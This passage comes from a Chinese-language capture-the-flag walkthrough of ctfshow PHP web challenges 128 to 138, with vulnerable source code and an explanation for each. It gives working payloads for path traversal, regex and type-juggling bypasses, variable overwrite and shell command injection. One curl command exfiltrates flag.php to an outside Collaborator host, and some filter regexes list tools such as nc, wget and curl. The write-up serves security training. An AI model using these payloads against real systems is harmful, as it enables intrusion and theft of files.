class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">check</span>(<span class="params"><span class="variable">$str</span></span>)</span>&#123;</span><br><span class="line">    <span class="keyword">return</span> !preg_match(<span class="string">&#x27;/[0-9]|[a-z]/i&#x27;</span>, <span class="variable">$str</span>);</span><br><span class="line">&#125; <span class="literal">NULL</span> </span><br></pre></td></tr></table></figure>



<p><strong><a target="_blank" rel="noopener" href="https://www.cnblogs.com/lost-1987/articles/3309693.html">gettext()</a>拓展函数的用法</strong>：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">_()是gettext()的拓展函数</span><br><span class="line">在开启相关设定后，_(&quot;666&quot;)等价于gettext(&quot;666&quot;)，且就返回其中的参数</span><br><span class="line"></span><br><span class="line">&lt;?php</span><br><span class="line">echo gettext(666);   //输出 666</span><br><span class="line">echo &quot;\n&quot;;</span><br><span class="line">echo _(&quot;666&quot;);		//输出 666</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://www.runoob.com/php/php-get_defined_vars-function.html">get_defined_vars()函数</a>：返回由所有已定义变量所组成的数组 ，very顾名思义</p>
<p>check() 的正则 <code>/[0-9]|[a-z]/i</code> 只拦截数字和字母，而 <code>_</code>（gettext() 的别名，前提是服务端装有 gettext 扩展）不含这两类字符，可以通过检查；它把参数字符串 <code>get_defined_vars</code> 原样返回，外层 call_user_func 再把这个字符串当函数名调用。因为 include 进来的 $flag 也在已定义变量之列，所以利用 <code>?f1=_&amp;f2=get_defined_vars</code> 就能把它 var_dump 出来</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">var_dump(call_user_func(call_user_func($f1,$f2)));</span><br><span class="line">var_dump(call_user_func(call_user_func(_,&#x27;get_defined_vars&#x27;)));</span><br><span class="line">var_dump(call_user_func(get_defined_vars));</span><br><span class="line">var_dump(get_defined_vars);</span><br></pre></td></tr></table></figure>



<h1 id="web129"><a href="#web129" class="headerlink" title="web129"></a>web129</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;f&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$f</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;f&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(stripos(<span class="variable">$f</span>, <span class="string">&#x27;ctfshow&#x27;</span>)&gt;<span class="number">0</span>)&#123;</span><br><span class="line">        <span class="keyword">echo</span> readfile(<span class="variable">$f</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://php.p2hp.com/manual/zh/function.stripos.php">stripos()函数</a></p>
<p><a target="_blank" rel="noopener" href="https://php.p2hp.com/manual/zh/function.readfile.php">readfile()函数</a>：条件是 <code>stripos($f,'ctfshow') &gt; 0</code>，即 ctfshow 必须出现且不能在第 0 位。<code>?f=/ctfshow/../../../../../../../var/www/html/flag.php</code> 以 / 开头，ctfshow 落在位置 1；路径解析时 <code>/ctfshow/..</code> 被后面的多级 <code>..</code> 抵消，实际打开的是 /var/www/html/flag.php。过滤只检查子串而不检查解析后的路径，这是典型的目录穿越绕过；另外 readfile() 输出内容后返回字节数，所以页面末尾会多出一个数字</p>
<h1 id="web130"><a href="#web130" class="headerlink" title="web130"></a>web130</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;f&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$f</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;f&#x27;</span>];</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/.+?ctfshow/is&#x27;</span>, <span class="variable">$f</span>))&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&#x27;bye!&#x27;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(stripos(<span class="variable">$f</span>, <span class="string">&#x27;ctfshow&#x27;</span>) === <span 
class="literal">FALSE</span>)&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&#x27;bye!!&#x27;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>php特性：</p>
<p>preg_match() 的第二个参数必须是字符串：传入数组时不会进行匹配，而是报警告并返回 NULL（旧版本为 false；PHP 8 直接抛 TypeError，该绕过对 PHP 8 无效）；正常情况匹配到返回 1，没匹配到返回 0</p>
<p>stripos() 在 ctfshow 位于开头时返回 0，而 <code>0 === FALSE</code> 为 false（0 并不强等于 false），所以第二个 die 不会触发</p>
<p>stripos() 同样不接受数组，遇到数组会报警告并返回 NULL，<code>NULL === FALSE</code> 也为 false，两处检查都被绕过</p>
<p>方法一（参数走 POST：<code>f=ctfshow</code>，后面带不带 <code>[]</code> 都一样，它只是普通字符；ctfshow 在开头，<code>.+?</code> 要求前面至少一个字符所以正则匹配不上，stripos 返回 0 而 <code>0 === FALSE</code> 不成立）：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?f=ctfshow[]</span><br></pre></td></tr></table></figure>

<p>方法二：</p>
<p>使用数组绕过：注意代码读的是 <code>$_POST['f']</code>，POST 传 <code>f[]=666</code> 使 $f 成为数组，preg_match() 和 stripos() 都因参数类型错误返回 NULL/false，两个 die 都不触发（PHP 8 会抛 TypeError）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?f[]=666</span><br></pre></td></tr></table></figure>

<p>方法三：</p>
<p><strong>p神</strong>：<a target="_blank" rel="noopener" href="https://www.leavesongs.com/PENETRATION/use-pcre-backtrack-limit-to-bypass-restrict.html">PHP利用PCRE回溯次数限制绕过某些安全限制</a></p>
<p>溢出回溯限制：<code>.+?ctfshow</code> 配合超长输入会让 PCRE 的回溯次数超过 <code>pcre.backtrack_limit</code>（默认 1000000），此时 preg_match() 不是返回 0 而是返回 false 并报错，<code>if</code> 同样不成立；stripos() 仍能找到末尾的 ctfshow，于是输出 flag。web131 把 $f 强转成字符串并要求包含 36Dctfshow（ctfshow 前面必然有字符，正则一定能匹配），数组法失效，只剩这一种思路</p>
<p>利用脚本：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url=<span class="string">&quot;http://.ctf.show:8080/&quot;</span></span><br><span class="line">data=&#123;</span><br><span class="line">    <span class="string">&#x27;f&#x27;</span>:<span class="string">&#x27;very&#x27;</span>*<span class="number">250000</span>+<span class="string">&#x27;ctfshow&#x27;</span></span><br><span class="line">&#125;</span><br><span class="line">r=requests.post(url,data=data)</span><br><span class="line"><span class="built_in">print</span>(r.text)</span><br></pre></td></tr></table></figure>



<h1 id="web131"><a href="#web131" class="headerlink" title="web131"></a>web131</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;f&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$f</span> = (<span class="keyword">String</span>)<span class="variable">$_POST</span>[<span class="string">&#x27;f&#x27;</span>];</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/.+?ctfshow/is&#x27;</span>, <span class="variable">$f</span>))&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&#x27;bye!&#x27;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    
<span class="keyword">if</span>(stripos(<span class="variable">$f</span>,<span class="string">&#x27;36Dctfshow&#x27;</span>) === <span class="literal">FALSE</span>)&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&#x27;bye!!&#x27;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h1 id="web132"><a href="#web132" class="headerlink" title="web132"></a>web132</h1><p>首先打开是一个网页，御剑扫一下有robots.txt和admin/index.php</p>
<p>打开admin/index.php得到源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">include</span>(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;username&#x27;</span>]) &amp;&amp; <span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;password&#x27;</span>]) &amp;&amp; <span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;code&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$username</span> = (<span class="keyword">String</span>)<span class="variable">$_GET</span>[<span class="string">&#x27;username&#x27;</span>];</span><br><span class="line">    <span class="variable">$password</span> = (<span class="keyword">String</span>)<span class="variable">$_GET</span>[<span class="string">&#x27;password&#x27;</span>];</span><br><span class="line">    <span class="variable">$code</span> = (<span class="keyword">String</span>)<span class="variable">$_GET</span>[<span class="string">&#x27;code&#x27;</span>];</span><br><span 
class="line"></span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$code</span> === mt_rand(<span class="number">1</span>,<span class="number">0x36D</span>) &amp;&amp; <span class="variable">$password</span> === <span class="variable">$flag</span> || <span class="variable">$username</span> ===<span class="string">&quot;admin&quot;</span>)&#123;</span><br><span class="line">        </span><br><span class="line">        <span class="keyword">if</span>(<span class="variable">$code</span> == <span class="string">&#x27;admin&#x27;</span>)&#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        </span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>PHP 里 <code>&amp;&amp;</code> 的优先级高于 <code>||</code>，外层条件等价于 <code>($code === mt_rand(...) &amp;&amp; $password === $flag) || $username === "admin"</code>，所以只要 <code>$username === "admin"</code> 成立，前半段（猜随机数、猜 flag）根本不需要满足——这就是本题的漏洞点。内层 <code>$code == 'admin'</code> 是字符串比较，直接传 admin 即可；三个参数都要 isset，payload：<code>?username=admin&amp;password=1&amp;code=admin</code>（查询串里各参数用单个 <code>&amp;</code> 分隔）</p>
<h1 id="web133"><a href="#web133" class="headerlink" title="web133"></a>web133</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="comment">//flag.php</span></span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$F</span> = @<span class="variable">$_GET</span>[<span class="string">&#x27;F&#x27;</span>])&#123;</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">&#x27;/system|nc|wget|exec|passthru|netcat/i&#x27;</span>, <span class="variable">$F</span>))&#123;</span><br><span class="line">        <span class="keyword">eval</span>(substr(<span class="variable">$F</span>,<span class="number">0</span>,<span class="number">6</span>));</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;6个字母都还不够呀?!&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://php.p2hp.com/manual/zh/function.substr.php">substr()函数</a></p>
<p><a target="_blank" rel="noopener" href="https://php.p2hp.com/manual/zh/function.shell-exec.php">shell_exec()函数</a></p>
<p><code>这个题是自己出的主要是考察，命令执行的骚操作和curl -F的使用</code><br> 分析一下代码：eval() 只执行 $F 的前 6 个字符，正则又拦了 system|nc|wget|exec|passthru|netcat 这些命令执行函数，而且没有写入权限，6 个字符看起来什么都做不了<br> 但是，如果这 6 个字符是 <code>`$F`;</code>，反引号里的 <code>$F</code> 会被插值成我们传入的完整字符串——被截断的只是 eval 的 PHP 代码，交给 shell 的命令并没有被截断<br> 那我们来一个简单的测试,</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">我们传递 ?F=`$F`;+sleep 3（+ 是 URL 编码的空格），网站确实 sleep 了一会，说明命令被执行了</span><br><span class="line">**那为什么会这样？**</span><br><span class="line">substr($F,0,6) 截出的前 6 个字符正好是 `$F`; ，eval() 把它当 PHP 代码执行</span><br><span class="line">PHP 里反引号是执行运算符，等价于 shell_exec()；它像双引号一样会先把变量 $F 插值进去，再把整串交给 shell</span><br><span class="line">而 $F 的值就是我们完整输入的 `$F`;+sleep 3，所以 shell 最终拿到的是</span><br><span class="line">`$F`; sleep 3 —— 前半段在 shell 里一般只是对空的 $F 做命令替换，分号后面的 sleep 3 正常执行</span><br><span class="line">正则只拦了 system|nc|wget|exec|passthru|netcat，没有拦 curl 和 sleep，所以后面可以用 curl 把文件外带出去</span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://www.ruanyifeng.com/blog/2019/09/curl-reference.html">curl 的参数用法</a></p>
<p>然后就是利用curl去带出flag.php<br> <code>curl -F 将flag文件上传到Burp的 Collaborator Client （ Collaborator Client 类似DNSLOG，其功能要比DNSLOG强大，主要体现在可以查看 POST请求包以及打Cookies）</code></p>
<p><a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/473336511">Collaborator Client用法</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"># payload </span><br><span class="line">#其中-F 为带文件的形式发送post请求</span><br><span class="line">#xx是上传文件的name值，flag.php就是上传的文件 </span><br><span class="line">?F=`$F`;+curl -X POST -F xx=@flag.php  http://8clb1g723ior2vyd7sbyvcx6vx1ppe.burpcollaborator.net</span><br></pre></td></tr></table></figure>

<p>使用方法：</p>
<p><img src="https://img-blog.csdnimg.cn/20201015162350800.png#pic_center" alt="在这里插入图片描述"></p>
<p><img src="https://img-blog.csdnimg.cn/20201015162406514.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ2MDkxNDY0,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p>
<h1 id="web-134"><a href="#web-134" class="headerlink" title="web 134"></a>web 134</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"> &lt;?php</span><br><span class="line"></span><br><span class="line">/*</span><br><span class="line"># -*- coding: utf-8 -*-</span><br><span class="line"># @Author: Firebasky</span><br><span class="line"># @Date:   2020-10-13 11:25:09</span><br><span class="line"># @Last Modified by:   h1xa</span><br><span class="line"># @Last Modified time: 2020-10-14 23:01:06</span><br><span class="line"></span><br><span class="line">*/</span><br><span class="line"></span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line">$key1 = 0;</span><br><span class="line">$key2 = 0;</span><br><span class="line">if(isset($_GET[&#x27;key1&#x27;]) || isset($_GET[&#x27;key2&#x27;]) || isset($_POST[&#x27;key1&#x27;]) || isset($_POST[&#x27;key2&#x27;])) &#123;</span><br><span class="line">    die(&quot;nonononono&quot;);</span><br><span class="line">&#125;</span><br><span class="line">@parse_str($_SERVER[&#x27;QUERY_STRING&#x27;]);</span><br><span class="line">extract($_POST);</span><br><span class="line">if($key1 == &#x27;36d&#x27; &amp;&amp; $key2 == &#x27;36d&#x27;) 
&#123;</span><br><span class="line">    die(file_get_contents(&#x27;flag.php&#x27;));</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>

<p>变量覆盖：前面的 isset 只检查原始的 $_GET/$_POST 里有没有 key1/key2；随后 <code>parse_str($_SERVER['QUERY_STRING'])</code> 不带第二个参数，会把查询串解析成当前作用域的变量，于是 <code>_POST[key1]=36d</code> 直接覆盖了超全局 $_POST，接着 <code>extract($_POST)</code> 把 key1/key2 释放成 $key1/$key2。两个值都必须是 <code>36d</code>（<code>'36' == '36d'</code> 为 false）</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_49480008/article/details/115872899">$_SERVER函数</a></p>
<p><a target="_blank" rel="noopener" href="https://www.w3school.com.cn/php/func_array_extract.asp">extract()函数</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?_POST[key1]=36d&amp;_POST[key2]=36d</span><br></pre></td></tr></table></figure>



<h1 id="web-135"><a href="#web-135" class="headerlink" title="web 135"></a>web 135</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="comment">//flag.php</span></span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$F</span> = @<span class="variable">$_GET</span>[<span class="string">&#x27;F&#x27;</span>])&#123;</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">&#x27;/system|nc|wget|exec|passthru|bash|sh|netcat|curl|cat|grep|tac|more|od|sort|tail|less|base64|rev|cut|od|strings|tailf|head/i&#x27;</span>, <span class="variable">$F</span>))&#123;</span><br><span class="line">        <span class="keyword">eval</span>(substr(<span class="variable">$F</span>,<span class="number">0</span>,<span class="number">6</span>));</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;师傅们居然破解了前面的，那就来一个加强版吧&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>



<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">?F=`$F` ;cp flag.php 666.txt</span><br><span class="line">?F=`$F` ;nl flag.php&gt;666.txt</span><br><span class="line">?F=`$F` ;mv flag.php 666.txt</span><br><span class="line"># 之后访问 /666.txt 读取。注意 mv 会把 flag.php 从原位置挪走，共享靶机或真实环境里优先用 cp 或重定向，不要破坏原文件</span><br></pre></td></tr></table></figure>



<h1 id="web-136"><a href="#web-136" class="headerlink" title="web 136"></a>web 136</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"> &lt;?php</span><br><span class="line">error_reporting(0);</span><br><span class="line">function check($x)&#123;</span><br><span class="line">    if(preg_match(&#x27;/\\$|\.|\!|\@|\#|\%|\^|\&amp;|\*|\?|\&#123;|\&#125;|\&gt;|\&lt;|nc|wget|exec|bash|sh|netcat|grep|base64|rev|curl|wget|gcc|php|python|pingtouch|mv|mkdir|cp/i&#x27;, $x))&#123;</span><br><span class="line">        die(&#x27;too young too simple sometimes naive!&#x27;);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">if(isset($_GET[&#x27;c&#x27;]))&#123;</span><br><span class="line">    $c=$_GET[&#x27;c&#x27;];</span><br><span class="line">    check($c);</span><br><span class="line">    exec($c);</span><br><span class="line">&#125;</span><br><span class="line">else&#123;</span><br><span class="line">    highlight_file(__FILE__);</span><br><span class="line">&#125;</span><br><span class="line">?&gt; </span><br></pre></td></tr></table></figure>



<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/jjlovefj/article/details/83176871">Linux tee命令</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">常见用例： tee file //覆盖</span><br><span class="line">tee -a file //追加</span><br><span class="line">tee - //输出到标准输出两次 tee - - //输出到标准输出三次</span><br><span class="line">tee file1 file2 - //输出到标准输出两次,并写到那两个文件中</span><br><span class="line">ls | tee file</span><br></pre></td></tr></table></figure>

<p>payload：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">?c=ls /|tee <span class="number">1</span></span><br><span class="line"><span class="comment">//exec() 没有回显，把根目录的列表通过 tee 写进网站目录下的文件 1；正则拦了 . 和 &gt; &lt;，所以不能重定向，文件名也不能带点，但 | 和 tee 没被拦</span></span><br><span class="line">访问 /<span class="number">1</span> 下载文件，发现 f149_15_h3r3</span><br><span class="line">?c=nl /f149_15_h3r3|tee <span class="number">1</span></span><br><span class="line">访问 /<span class="number">1</span> 下载文件得到 flag</span><br></pre></td></tr></table></figure>



<h1 id="web-137"><a href="#web-137" class="headerlink" title="web 137"></a>web 137</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">ctfshow</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;private class&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">static</span> <span class="function"><span class="keyword">function</span> <span class="title">getFlag</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> file_get_contents(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line">    &#125;</span><br><span 
class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">call_user_func(<span class="variable">$_POST</span>[<span class="string">&#x27;ctfshow&#x27;</span>]);</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>call_user_func() 接受 <code>'类名::方法名'</code> 形式的字符串，可以直接调用静态方法；这里没有反序列化，__wakeup() 里的 die 根本不会触发</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">php中 -&gt;与:: 调用类中的成员的区别</span><br><span class="line">-&gt;用于动态语境处理某个类的某个实例</span><br><span class="line">::可以调用一个静态的、不依赖于其他初始化的类方法</span><br></pre></td></tr></table></figure>

<p>payload：<code>ctfshow=ctfshow::getFlag</code></p>
<h1 id="web-138"><a href="#web-138" class="headerlink" title="web 138"></a>web 138</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">ctfshow</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;private class&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">static</span> <span class="function"><span class="keyword">function</span> <span class="title">getFlag</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> file_get_contents(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line">    &#125;</span><br><span 
